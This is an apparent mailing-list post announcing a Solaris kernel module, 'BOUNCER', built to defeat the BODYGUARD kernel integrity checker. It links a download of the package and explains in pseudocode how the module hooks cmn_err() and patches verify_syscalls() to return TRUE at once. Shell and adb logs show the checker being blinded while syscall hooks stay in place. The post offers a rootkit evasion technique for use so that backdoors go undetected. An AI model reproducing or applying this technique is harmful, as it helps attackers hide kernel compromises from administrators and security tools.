apoligies for replying my own mail but i must say; i have sucessfully developed what i was talking about below... also fix an alignment issue that leads to a crash in some rare cases. you can download the new package from: http://gsu.linux.org.tr/~noir/b.tar.gz > > primary_inhouse_kernel_function_used_by_bodyguard() > { > ..... > if(kobj_getsymvalue(verify_syscalls,1)){ > do page protection manipulation > patch the proper place with "return TRUE" of the verify_syscalls() > !! this will make verify_syscalls return TRUE meaning no problems > } > .... > do the realstuff ... > } > > this will render any kernel integrity level checker useless. solution > is simple integrity checkers have to be stealh to like their counterparts > (backdoors) here is how things are: bouncer hooks cmn_err()* and checks if verify_syscalls() resolvs, if YES it patches the first 2 instructions of verify_syscalls with "retl; nop; * cmn_err() is used for reporting to userland (through /var/adm/messages) so at _init() bodyguard call cmn_err() to report of its successful installation, nada! bouncer kicks in and patches verify_syscall() ... ;0) now you can even change the sysent/sysent32 table with no worries ; ) logs of BOUNCER in action: bash-2.03# uname -a SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10 bash-2.03# isainfo -b 64 bash-2.03# cd BOUNCER/ bash-2.03# modload b2 bash-2.03# bash-2.03# /usr/local/sbin/sshd bash: /usr/lib/.funky/sshd: No such file or directory bash-2.03# cd ../BODYGUARD bash-2.03# sh runbodyguard_verifier.sh This is the license for BodyGuard Kernel Verifier, Demo Version 1.0 ..... Jul 7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE: Installing Immunity BODYGUARD module! Jul 7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there are any problems, please e-mail Dave Aitel at dave@immunitysec.com Jul 7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is just a demo version of the Immunity BODYGUARD product. Jul 7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a year-long site license, or limited source code license, please see http://www.immunitysec.com. Jul 7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done installing BODYGUARD. Jul 7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing BODYGUARD module! Jul 7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE: Installing Immunity BODYGUARD module! Jul 7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there are any problems, please e-mail Dave Aitel at dave@immunitysec.com Jul 7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is just a demo version of the Immunity BODYGUARD product. bash-2.03# modload bodyguard bash-2.03# adb -k /dev/ksyms physmem 3b5b verify_syscalls/i verify_syscalls: verify_syscalls: retl verify_syscalls+4: nop cmn_err+0x94/i cmn_err+0x94: call uncle_steve_albini exece+0xc/i exece+0xc: call hook_execcommon later, noir
